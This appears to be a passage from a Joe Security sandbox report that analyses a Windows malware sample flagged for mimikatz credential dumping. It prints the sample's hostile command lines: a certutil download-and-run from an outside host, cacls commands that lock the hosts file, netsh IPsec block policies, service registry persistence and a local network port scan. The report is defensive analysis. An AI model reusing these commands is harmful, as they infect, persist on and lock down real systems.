C:\Windows\SysWOW64\ycemck.exe 0 73728 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 6d de 5c 65 0c b0 0f 65 0c b0 0f 65 0c b0 0f 1e 10 bc 0f 64 0c b0 0f a6 03 ed 0f 63 0c b0 0f e6 10 be 0f 64 0c b0 0f 0a 13 bb 0f 64 0c b0 0f 0a 13 ba 0f 6e 0c b0 0f 0a 13 b4 0f 67 0c b0 0f 53 2a bb 0f 66 0c b0 0f 53 2a b4 0f 66 0c b0 0f 65 0c b1 0f 6e 0d b0 0f 8d 13 bb 0f 6c 0c b0 0f a2 0a b6 0f 64 0c b0 0f 52 69 63 68 65 0c b0 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche..................
success or wait 1 100033DA CopyFileA
File Path Offset Length Completion CountSourceAddress Symbol
File CreatedFile Created
File MovedFile Moved
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 53 of 69
Key Path Name Type Data Completion CountSourceAddress Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu
Group unicode Default success or wait 1 10004A8C RegSetValueExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu
InstallTime unicode 2019-05-16 17:15 success or wait 1 10004A8C RegSetValueExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
unicode array \??\C:\Windows\SysWOW64\506281.bak
success or wait 1 100020A4 MoveFileExA
Key Path Name Type Old Data New Data Completion CountSourceAddress Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nprrstu
Description unicode nprrstu nprrstu Yabcdefgh Jklmnop Rstuvwxy Bcd
success or wait 1 100035CA RegSetValueExA
File ActivitiesFile Activities
Start time: 17:15:37
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\ycemck.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ycemck.exe
Imagebase: 0x400000
File size: 73728 bytes
MD5 hash: EABDC54C61088B769E9AF917AA6B05A4
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches: Detection: 100%, AviraDetection: 79%, virustotal, Browse
Reputation: low
File Path Offset Length Completion CountSourceAddress Symbol
Start time: 17:15:40
Start date: 16/05/2019
Path: C:\WebKitSdk\2.25.14\sqlisrv.exe
Wow64 process (32bit): true
Commandline: C:\WebKitSdk\2.25.14\sqlisrv.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
Key Value CreatedKey Value Created
Key Value ModifiedKey Value Modified
Analysis Process: ycemck.exe PID: 3268 Parent PID: 564Analysis Process: ycemck.exe PID: 3268 Parent PID: 564
General
Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076Analysis Process: sqlisrv.exe PID: 4748 Parent PID: 3076
General
Copyright Joe Security LLC 2019 Page 54 of 69
File ActivitiesFile Activities
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, Author: @fusionrace
Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Windows\cc3d3243\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 42A03F CreateDirectoryA
C:\Windows\cc3d3243\b158ac7.exe read data or list directory | read attributes | delete | write dac | synchronize | generic read | generic write
archive sequential only | non directory file
success or wait 1 42A083 CopyFileA
C:\Users\user\AppData\Local\Temp\509484 read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 404859 CreateDirectoryA
C:\Users\user\AppData\Local\Temp\509484\....\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 404896 CreateDirectoryA
File Path Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Temp\509484\TemporaryFile\TemporaryFile cannot delete 1 442366 DeleteFileA
Old File Path New File Path Completion CountSourceAddress Symbol
C:\WebKitSdk\2.25.14\sqlisrv.exe C:\Users\user\AppData\Local\Temp\509484\....\TemporaryFile success or wait 1 4048E5 MoveFileA
C:\Users\user\AppData\Local\Temp\509484\.... C:\Users\user\AppData\Local\Temp\509484\TemporaryFile success or wait 1 40494A MoveFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File CreatedFile Created
File DeletedFile Deleted
File MovedFile Moved
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 55 of 69
C:\Windows\cc3d3243\b158ac7.exe 0 524288 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...]
success or wait 9 42A083 CopyFileA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 17:15:41
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c ping 127.0.0.1 -n 8 & Start C:\Windows\cc3d3243\b158ac7.exe
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
Start time: 17:15:41
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe %SystemRoot%\Temp\sqlisrv.exe & %SystemRoot%\Temp\sqlisrv.exe
Analysis Process: cmd.exe PID: 1896 Parent PID: 4748Analysis Process: cmd.exe PID: 1896 Parent PID: 4748
General
Analysis Process: cmd.exe PID: 4080 Parent PID: 3076Analysis Process: cmd.exe PID: 4080 Parent PID: 3076
General
Copyright Joe Security LLC 2019 Page 56 of 69
File ActivitiesFile Activities
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
Start time: 17:15:41
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Start time: 17:15:42
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Start time: 17:15:42
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 8
Imagebase: 0x2d0000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has administrator privileges: true
Programmed in: C, C++ or other language
Analysis Process: conhost.exe PID: 2560 Parent PID: 1896Analysis Process: conhost.exe PID: 2560 Parent PID: 1896
General
Analysis Process: conhost.exe PID: 4960 Parent PID: 4080Analysis Process: conhost.exe PID: 4960 Parent PID: 4080
General
Analysis Process: PING.EXE PID: 2864 Parent PID: 1896Analysis Process: PING.EXE PID: 2864 Parent PID: 1896
General
Copyright Joe Security LLC 2019 Page 57 of 69
File ActivitiesFile Activities
Reputation: moderate
File Path Access Attributes Options Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 17:15:42
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit): true
Commandline: certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe C:\Windows\Temp\sqlisrv.exe
Imagebase: 0x10a0000
File size: 1273856 bytes
MD5 hash: D056DF596F6E02A36841E69872AEF7BD
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe
unknown 3325 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 2e 39 34 00 55 50 58 21 0d 09 08 09 d0 c5 8e 26 e5 7a 9a a9 5a dd 5f 00 ee 3f 47 00 00 50 5c 00 26 1e 00 39 fe db
..............................
..............................
..............................
..............................
..............................
..............................
..............................
......3.94.UPX!.......&.z..Z._
..?G..P\.&..9..
success or wait 1 10E751E InternetReadFile
Analysis Process: certutil.exe PID: 3304 Parent PID: 4080Analysis Process: certutil.exe PID: 3304 Parent PID: 4080
General
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 58 of 69
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe
unknown 4096 41 51 0e 5a 01 ff 53 89 0b 50 3b c8 0f 8f a4 8d 63 b5 7e 00 d5 51 1a 48 79 50 04 bc a4 f2 04 59 5b 67 79 e3 09 84 09 e4 8a 03 cb 07 ff 90 1d ec db 04 69 dc 35 5a 59 37 9a ca b7 d4 16 d4 dc 05 8c 70 cc cc 83 1a e8 82 36 ec d9 68 3e 78 ab 5d bd 1c 30 40 27 f7 43 4c 24 21 84 7c 6a 2b 86 62 82 e0 97 d4 89 55 d8 25 e8 8a 05 87 9b 8d 85 e6 6e 35 a0 69 53 9c 92 f0 dc 25 11 d0 78 d0 91 b0 80 60 7b 12 82 e4 51 7b cc c6 03 20 bb 8c 70 2c 40 8e e1 fc a1 ec 51 b0 79 24 ec 8a 03 88 03 2d 01 19 88 60 15 d4 54 9a 0b 90 e8 d0 d0 d4 72 c0 f0 c8 ee 2d 58 4d 52 01 25 13 04 52 07 9c e8 f5 58 5b 59 43 99 40 19 25 87 02 0c f4 57 20 9f f9 25 b8 81 b7 51 90 96 62 15 13 01 87 d1 15 18 d0 2d cd 51 c1 a3 42 f2 89 b0 14 71 19 49 0e 72 32 00 9b 62 1d c1 88 61 5b fc 77 56 c0 12 83 f0
AQ.Z..S..P;.....c.~..Q.HyP.....Y[gy...............i.5ZY7.........p......6..h>x.]..0@'.CL$!.|j+.b.....U.%........n5.iS....%..x....`{...Q{... ..p,@.....Q.y$.....-...`..T.......r....-XMR.%..R....X[YC.@.%....W ..%...Q..b........-.Q..B....q.I.r2..b...a[.wV....
success or wait 1137 10E756C InternetReadFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
Start time: 17:15:49
Start date: 16/05/2019
Path: C:\Windows\cc3d3243\b158ac7.exe
Wow64 process (32bit): true
Commandline: C:\Windows\cc3d3243\b158ac7.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: @fusionrace
Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896
General
Copyright Joe Security LLC 2019 Page 59 of 69
Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse
Reputation: low
File ActivitiesFile Activities
Start time: 17:15:50
Start date: 16/05/2019
Path: C:\Windows\cc3d3243\b158ac7.exe
Wow64 process (32bit): true
Commandline: C:\Windows\cc3d3243\b158ac7.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: @fusionrace
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
C:\Windows\5c2a55da8\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 42A03F CreateDirectoryA
C:\Windows\5c2a55da8\Coolmaster\ read data or list directory | synchronize
normal directory file | synchronous io non alert | open for backup ident | open reparse point
success or wait 1 42A03F CreateDirectoryA
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564
General
File CreatedFile Created
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 60 of 69
C:\Windows\System32\drivers\etc\hosts unknown 822 23 20 63 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 33 2d 32 30 30 39 20 6d 69 63 72 6f 73 6f 66 74 20 63 6f 72 70 2e 0d 0a 23 0d 0a 23 20 74 68 69 73 20 69 73 20 61 20 73 61 6d 70 6c 65 20 68 6f 73 74 73 20 66 69 6c 65 20 75 73 65 64 20 62 79 20 6d 69 63 72 6f 73 6f 66 74 20 74 63 70 2f 69 70 20 66 6f 72 20 77 69 6e 64 6f 77 73 2e 0d 0a 23 0d 0a 23 20 74 68 69 73 20 66 69 6c 65 20 63 6f 6e 74 61 69 6e 73 20 74 68 65 20 6d 61 70 70 69 6e 67 73 20 6f 66 20 69 70 20 61 64 64 72 65 73 73 65 73 20 74 6f 20 68 6f 73 74 20 6e 61 6d 65 73 2e 20 65 61 63 68 0d 0a 23 20 65 6e 74 72 79 20 73 68 6f 75 6c 64 20 62 65 20 6b 65 70 74 20 6f 6e 20 61 6e 20 69 6e 64 69 76 69 64 75 61 6c 20 6c 69 6e 65 2e 20 74 68 65 20 69 70 20 61 64 64 72 65 73 73 20 73 68 6f 75 6c
# copyright (c) 1993-2009 microsoft corp...#..# this is a sample hosts file used by microsoft tcp/ip for windows...#..# this file contains the mappings of ip addresses to host names. each..# entry should be kept on an individual line. the ip address shoul
success or wait 1 4A4C98 WriteFile
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
File Path Offset Length Completion CountSourceAddress Symbol
C:\Windows\System32\drivers\etc\hosts unknown 824 success or wait 1 4A4C5F ReadFile
File ActivitiesFile Activities
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
File ReadFile Read
Analysis Process: cmd.exe PID: 3968 Parent PID: 3356Analysis Process: cmd.exe PID: 3968 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 3384 Parent PID: 3968Analysis Process: conhost.exe PID: 3384 Parent PID: 3968
General
Copyright Joe Security LLC 2019 Page 61 of 69
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File ActivitiesFile Activities
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
File Path Access Attributes Options Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Start time: 17:15:52
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit): true
Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
Imagebase: 0x1360000
File size: 27648 bytes
MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
\Device\ConDrv unknown 1 41 A success or wait 19 13649CC fprintf
\Device\ConDrv unknown 1 70 p success or wait 16 13649CC fprintf
Analysis Process: cmd.exe PID: 1576 Parent PID: 3968Analysis Process: cmd.exe PID: 1576 Parent PID: 3968
General
Analysis Process: cacls.exe PID: 4728 Parent PID: 3968Analysis Process: cacls.exe PID: 4728 Parent PID: 3968
General
File WrittenFile Written
Copyright Joe Security LLC 2019 Page 62 of 69
File Path Offset Length Completion CountSourceAddress Symbol
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Start time: 17:15:53
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: netsh ipsec static add policy name=Bastards description=FuckingBastards
Imagebase: 0xb70000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has administrator privileges: true
Programmed in: C, C++ or other language
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
\Device\ConDrv unknown 2 0d 0a .. success or wait 1 B77B1B WriteFile
Key Path Completion CountSourceAddress Symbol
Key Path Name Type Data Completion CountSourceAddress Symbol
Start time: 17:15:53
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:15:54
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Analysis Process: netsh.exe PID: 4864 Parent PID: 3356Analysis Process: netsh.exe PID: 4864 Parent PID: 3356
General
File WrittenFile Written
Analysis Process: conhost.exe PID: 3340 Parent PID: 4864Analysis Process: conhost.exe PID: 3340 Parent PID: 4864
General
Analysis Process: netsh.exe PID: 1784 Parent PID: 3356Analysis Process: netsh.exe PID: 1784 Parent PID: 3356
General
Copyright Joe Security LLC 2019 Page 63 of 69
File ActivitiesFile Activities
Registry ActivitiesRegistry Activities
Commandline: netsh ipsec static add filteraction name=BastardsList action=block
Imagebase: 0xb70000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has administrator privileges: true
Programmed in: C, C++ or other language
File Path Access Attributes Options Completion CountSourceAddress Symbol
File Path Offset Length Value Ascii Completion CountSourceAddress Symbol
\Device\ConDrv unknown 2 0d 0a .. success or wait 1 B77B1B WriteFile
Key Path Completion CountSourceAddress Symbol
Key Path Name Type Data Completion CountSourceAddress Symbol
Start time: 17:15:54
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:15:57
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
File WrittenFile Written
Analysis Process: conhost.exe PID: 752 Parent PID: 1784Analysis Process: conhost.exe PID: 752 Parent PID: 1784
General
Analysis Process: cmd.exe PID: 2944 Parent PID: 3968Analysis Process: cmd.exe PID: 2944 Parent PID: 3968
General
Analysis Process: cacls.exe PID: 3632 Parent PID: 3968Analysis Process: cacls.exe PID: 3632 Parent PID: 3968
Copyright Joe Security LLC 2019 Page 64 of 69
Start time: 17:15:57
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit): true
Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
Imagebase: 0x1360000
File size: 27648 bytes
MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:16:03
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:16:03
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit): true
Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
Imagebase: 0x1360000
File size: 27648 bytes
MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:16:27
Start date: 16/05/2019
Path: C:\Windows\Temp\sqlisrv.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Temp\sqlisrv.exe
Imagebase: 0x400000
File size: 4672000 bytes
MD5 hash: 1328C9CC50BD324399B4A83CA043BE6E
Has administrator privileges: true
Programmed in: C, C++ or other language
General
Analysis Process: cmd.exe PID: 4316 Parent PID: 3968Analysis Process: cmd.exe PID: 4316 Parent PID: 3968
General
Analysis Process: cacls.exe PID: 1252 Parent PID: 3968Analysis Process: cacls.exe PID: 1252 Parent PID: 3968
General
Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080
General
Copyright Joe Security LLC 2019 Page 65 of 69
Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: @fusionrace
Antivirus matches: Detection: 100%, AviraDetection: 100%, Joe Sandbox MLDetection: 74%, virustotal, Browse
Start time: 17:17:14
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd /c C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32
Imagebase: 0x1180000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:14
Start date: 16/05/2019
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0x4
Imagebase: 0x7ff601f50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:14
Start date: 16/05/2019
Path: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe
Wow64 process (32bit): true
Analysis Process: cmd.exe PID: 4068 Parent PID: 3356Analysis Process: cmd.exe PID: 4068 Parent PID: 3356
General
Analysis Process: conhost.exe PID: 2924 Parent PID: 4068Analysis Process: conhost.exe PID: 2924 Parent PID: 4068
General
Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068
General
Copyright Joe Security LLC 2019 Page 66 of 69
Commandline: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32
Imagebase: 0xf90000
File size: 64512 bytes
MD5 hash: 821EA58E3E9B6539FF0AFFD40E59F962
Has administrator privileges: true
Programmed in: C, C++ or other language
Start time: 17:17:26
Start date: 16/05/2019
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
